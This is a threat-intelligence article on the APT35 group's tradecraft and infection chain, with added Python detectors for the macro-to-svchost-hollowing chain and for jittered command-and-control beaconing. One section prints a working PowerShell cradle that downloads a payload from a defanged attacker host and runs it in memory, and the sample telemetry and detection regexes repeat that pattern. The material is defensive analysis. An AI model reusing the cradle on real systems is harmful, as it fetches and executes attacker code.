IRGC-Linked APT35’s Structure, Toolset, and Espionage Operations Revealed

Since surfacing in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its methods to target government agencies, energy companies, and diplomatic missions across the Middle East and beyond. What began as credential-harvesting phishing campaigns has matured into a modular, multi-stage toolkit that supports deep network infiltration and prolonged espionage.

Background and Evolution

Initially, APT35 focused on spear-phishing that captured credentials by luring victims into opening malicious Office documents. Over time, the group expanded its capabilities to include custom implants and the reuse of public tooling, producing a mixed toolset that leaves identifiable code fingerprints even when payloads change.

Cloudsek researchers also linked the group’s adoption of .NET-based implants to a shift toward in-memory execution, which reduces the on-disk footprint and complicates forensic recovery. That observation builds on the earlier analysis and has informed the development of defensive rules for network defenders.

Toolset and Tradecraft

APT35 combines bespoke malware with off-the-shelf components, allowing operators to pivot between payloads while retaining unique artefacts that analysts can track. Common tradecraft elements include randomized command-and-control beaconing intervals, encrypted channels tunneled over HTTP or HTTPS, and techniques designed to minimize on-disk traces, such as process injection and in-memory loaders.

Beyond malware, the group relies heavily on open-source intelligence, crafting tailored lures that exploit regional geopolitics and professional relationships to increase the likelihood of victim interaction. This human-focused preparation, paired with technical sophistication, increases success rates and extends dwell time inside compromised networks.

Infection Mechanism, Deep Dive

APT35 often begins with a weaponized Word document containing obfuscated VBA macros that are designed to load a staged downloader directly into memory. When the user opens the document, the macro runs a PowerShell command that masquerades as a legitimate Windows Update process and downloads and executes the next-stage payload.

Example macro behavior, presented for analyst review and reproduction in defensive labs, looks like this; run it only in an isolated environment:

# Stage-1 downloader as launched from the macro: fetch the next stage and run it in memory.
$u = "http://malicious[.]domain/payload.bin"              # defanged C2 URL (will not resolve as written)
$r = Invoke-WebRequest -Uri $u -UseBasicParsing           # -UseBasicParsing avoids the IE parsing engine dependency
$e = [System.Text.Encoding]::UTF8.GetString($r.Content)   # raw response bytes decoded into script text
Invoke-Expression $e                                      # executed as script text, never written to disk

The staged downloader then decrypts a DLL with an AES key carried in the VBA; the key is commonly stored in an encrypted resource to hinder detection. The decrypted component, frequently a .NET backdoor referred to as PhosphorusLoader, registers itself as a COM object to achieve persistence. Operators then use process hollowing to inject the implant into svchost.exe, and the implant beacons intermittently to a concealed C2 domain. See Figure 1 for the injection workflow.
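Each step of the chain above leaves a footprint in telemetry that Sysmon and PowerShell logging already collect, which makes the sequence itself a detection opportunity even when the individual payload hashes change. The Python below is an added example written for this page, not code from APT35, Cloudsek or any referenced tool. The event records are constructed, the field names are simplified from Sysmon and PowerShell log fields, and the event IDs are the real ones (Sysmon 1 process creation, Sysmon 13 registry value set, PowerShell 4104 script block). The hostnames, CLSID and file paths are illustrative. The last rule relies on a property of process hollowing: the loader creates its svchost.exe target in a suspended state, so the hollowed process shows the loader, not services.exe, as its parent.

```python
"""Chain detector for: Office macro -> in-memory PowerShell cradle ->
COM InprocServer32 persistence -> svchost.exe hollowing.
Added example for this page; not APT35, Cloudsek or any tool's code.
All events below are constructed."""
import re
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# PowerShell 4104 script-block patterns: a download cradle combined with in-memory execution.
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloaddata|net\.webclient", re.I)
IN_MEMORY_EXEC = re.compile(r"invoke-expression|\biex\b|\[reflection\.assembly\]::load", re.I)
# Sysmon 13 patterns: a CLSID's InprocServer32 value pointing at a user-writable location.
COM_INPROC = re.compile(r"\\Classes\\CLSID\\\{[0-9a-f-]+\}\\InprocServer32", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Users\\Public|Temp|ProgramData)\\", re.I)


def _base(path):
    """Lower-cased file name of a Windows path ('' stays '')."""
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(ev):
    """Map one event to a stage of the chain, or None if it is unremarkable."""
    eid = ev["event_id"]
    image, parent = _base(ev.get("image", "")), _base(ev.get("parent", ""))
    if eid == 1 and parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        return "office_spawns_script_host"
    if eid == 4104:
        script = ev.get("script", "")
        if DOWNLOAD_CRADLE.search(script) and IN_MEMORY_EXEC.search(script):
            return "in_memory_download_cradle"
    if eid == 13 and COM_INPROC.search(ev.get("target", "")) and USER_WRITABLE.search(ev.get("details", "")):
        return "com_inprocserver32_to_user_path"
    # A genuine service host is started by services.exe; a hollowed one is
    # started (suspended) by the loader, so its parent is something else.
    if eid == 1 and image == "svchost.exe" and parent != "services.exe":
        return "svchost_unexpected_parent"
    return None


def correlate(events):
    """Per host, the distinct stages observed, in order of first occurrence."""
    chain = defaultdict(list)
    for ev in events:
        stage = stage_of(ev)
        if stage and stage not in chain[ev["host"]]:
            chain[ev["host"]].append(stage)
    return dict(chain)


def alerts(events, min_stages=2):
    """Hosts on which at least min_stages distinct stages of the chain were seen."""
    return {h: s for h, s in correlate(events).items() if len(s) >= min_stages}


# Constructed sample telemetry (paths, CLSID and hostnames are illustrative).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    # WS-042: the full chain described in the text
    {"host": "WS-042", "event_id": 1, "image": PS, "parent": WORD},
    {"host": "WS-042", "event_id": 4104,
     "script": "$r = Invoke-WebRequest -Uri $u -UseBasicParsing; IEX ([Text.Encoding]::UTF8.GetString($r.Content))"},
    {"host": "WS-042", "event_id": 13,
     "target": r"HKU\S-1-5-21-1004\Software\Classes\CLSID\{1A2B3C4D-0000-4000-8000-000000000042}\InprocServer32",
     "details": r"C:\Users\jdoe\AppData\Roaming\Microsoft\update.dll"},
    {"host": "WS-042", "event_id": 1, "image": r"C:\Windows\System32\svchost.exe", "parent": PS},
    # WS-019: a macro spawning PowerShell with nothing further seen (one stage, no alert)
    {"host": "WS-019", "event_id": 1, "image": PS, "parent": WORD},
    # WS-007: benign activity that individually resembles each stage
    {"host": "WS-007", "event_id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe"},
    {"host": "WS-007", "event_id": 4104,
     "script": r"Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\Temp\report.csv"},
    {"host": "WS-007", "event_id": 13,
     "target": r"HKLM\SOFTWARE\Classes\CLSID\{1A2B3C4D-0000-4000-8000-000000000042}\InprocServer32",
     "details": r"C:\Program Files\Vendor\addin.dll"},
    {"host": "WS-007", "event_id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for host, stages in alerts(SAMPLE_EVENTS).items():
        print(host, "->", " > ".join(stages))
```

Requiring two or more stages per host is what keeps the benign WS-007 events quiet: a download with -OutFile, a vendor add-in registered under HKLM, and a services.exe-spawned svchost.exe each match nothing on their own. In production the stage rules would be expressed in the SIEM's query language and the host-level correlation window bounded in time.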

Operational Impact and Detection Challenges

Compromised networks have experienced exfiltration of diplomatic communications, theft of intellectual property, and strategic reconnaissance aligned with state-level objectives. APT35’s operational security measures often foil signature-based defenses, and victims can remain unaware of intrusions for months, enabling extensive lateral movement and data collection.

Because the group blends human-focused social engineering with evasive execution techniques, defenders need layered detection: behaviour-based telemetry, memory-analysis capability, and custom rules tuned to surface beaconing that persists despite randomized intervals and to flag suspicious COM registration patterns.
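Randomized beacon intervals (Toolset and Tradecraft) defeat rules that look for one fixed period, but bounded jitter still leaves the gap distribution far tighter than interactive traffic, which is the property the rule suggested above can exploit. The Python below is an added example for this page, not Cloudsek's or APT35's code: it groups outbound connection records per source/destination pair and flags pairs whose inter-connection gaps have a low coefficient of variation. The records, hostnames and thresholds are constructed for illustration; in practice the thresholds and an allowlist for legitimately periodic services (update checks, NTP, monitoring agents) have to be tuned to the environment.

```python
"""Jitter-tolerant beacon detection over outbound connection records.
Added example for this page, not APT35 or Cloudsek code; all records are constructed."""
from collections import defaultdict
from statistics import mean, pstdev


def expand(src, dst, start, gaps):
    """Build (epoch_seconds, src, dst) records from a start time and a list of
    inter-connection gaps. Used only to construct the sample data below."""
    records, t = [(start, src, dst)], start
    for g in gaps:
        t += g
        records.append((t, src, dst))
    return records


# Constructed sample: a 5-minute beacon with roughly ±6% jitter, ordinary
# browsing to one site, and a run of connections too short to judge.
BEACON_GAPS = [300, 312, 287, 295, 318, 281, 305, 299, 290, 316, 284, 308]
BROWSING_GAPS = [2, 1, 45, 3, 600, 1, 2, 1800, 4, 2, 90, 1]
SHORT_GAPS = [60, 60]

RECORDS = (
    expand("WS-042", "cdn-update.example[.]net", 1_709_542_800, BEACON_GAPS)
    + expand("WS-042", "www.example.com", 1_709_542_830, BROWSING_GAPS)
    + expand("WS-007", "time.example.org", 1_709_542_900, SHORT_GAPS)
)


def detect_beacons(records, min_conns=8, max_cv=0.3):
    """Return {(src, dst): stats} for pairs whose connection gaps are regular.

    cv = population stddev / mean of the gaps. Uniform ±20% jitter around a
    fixed period gives cv ≈ 0.12, so max_cv=0.3 tolerates jitter while
    rejecting bursty human traffic, whose cv is well above 1."""
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)

    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_conns:        # too few samples to estimate a period
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:                      # duplicate timestamps only; nothing to measure
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits[pair] = {"count": len(times), "mean": avg, "cv": cv}
    return hits


if __name__ == "__main__":
    for (src, dst), s in detect_beacons(RECORDS).items():
        print(f"{src} -> {dst}: {s['count']} conns, period ~{s['mean']:.0f}s, cv={s['cv']:.3f}")
```

Only the WS-042 pair to cdn-update.example[.]net is flagged: its thirteen connections have a mean gap near 300 s with a coefficient of variation around 0.04, while the browsing pair's gaps are bursty and the WS-007 pair has too few connections to score. The min_conns floor matters as much as the cv threshold; without it any two connections an equal distance apart would look perfectly periodic.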